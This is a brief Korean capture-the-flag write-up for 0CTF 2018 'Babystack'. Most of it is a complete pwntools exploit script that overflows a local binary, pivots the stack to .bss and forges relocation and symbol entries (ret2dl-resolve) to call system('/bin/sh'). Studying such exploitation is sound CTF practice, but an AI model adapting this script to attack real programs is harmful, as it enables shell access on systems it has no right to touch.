[0CTF_2018] Babystack

read만 있다. bss로 스택 마이그레이션 시켜서 return_to_dl_resolve로 해결하면 되는데 이 return_to_dl_resolve가 엄청 복잡하다,, : (

 

https://www.lazenca.net/display/TEC/01.Return-to-dl-resolve+-+x86#id-01.Return-to-dl-resolve-x86-Exploitcode

01.Return-to-dl-resolve - x86 - TechNote - Lazenca.0x0

여기에서 진짜 잘 설명하고 있어서 이거보고 이해하는게 좋다.

 

from pwn import *
 
s = process("./babystack")
elf = ELF("./babystack")
 
 
leave_ret = 0x08048455
pppr = 0x080484e9
 
addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
addr_dynstr = elf.get_section_by_name('.dynstr').header['sh_addr']
addr_relplt = elf.get_section_by_name('.rel.plt').header['sh_addr']
addr_plt = elf.get_section_by_name('.plt').header['sh_addr']
bss = elf.bss()
 
 
 
 
gdb.attach(s)
 
pay = "A"*0x28
pay += p32(elf.bss()+0x2fc)
pay += p32(elf.plt['read'])
pay += p32(leave_ret)
pay += p32(0)
pay += p32(elf.bss()+0x300)
pay += p32(0x500)
 
s.send(pay)
 
 
base_stage = bss + 0x300
 
addr_fake_reloc = base_stage + 20
addr_fake_sym = addr_fake_reloc + 8
addr_fake_symstr = addr_fake_sym + 16
addr_fake_cmd = addr_fake_symstr + 7
 
fake_reloc_offset = addr_fake_reloc - addr_relplt
fake_r_info = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF
fake_r_info = fake_r_info | 0x7
fake_st_name = addr_fake_symstr - addr_dynstr
 
pay = p32(addr_plt)
pay += p32(fake_reloc_offset)
pay += p32(elf.plt['read'])
pay += "B"*4
pay += p32(addr_fake_cmd)
#fake elf32_rel
pay += p32(elf.got['read'])
pay += p32(fake_r_info)
#Fake elf32_sym
pay += p32(fake_st_name)
pay += p32(0)
pay += p32(0)
pay += p32(0)
pay += "system\x00"
pay += "/bin/sh\x00"
 
s.send(pay)
 
 
s.interactive()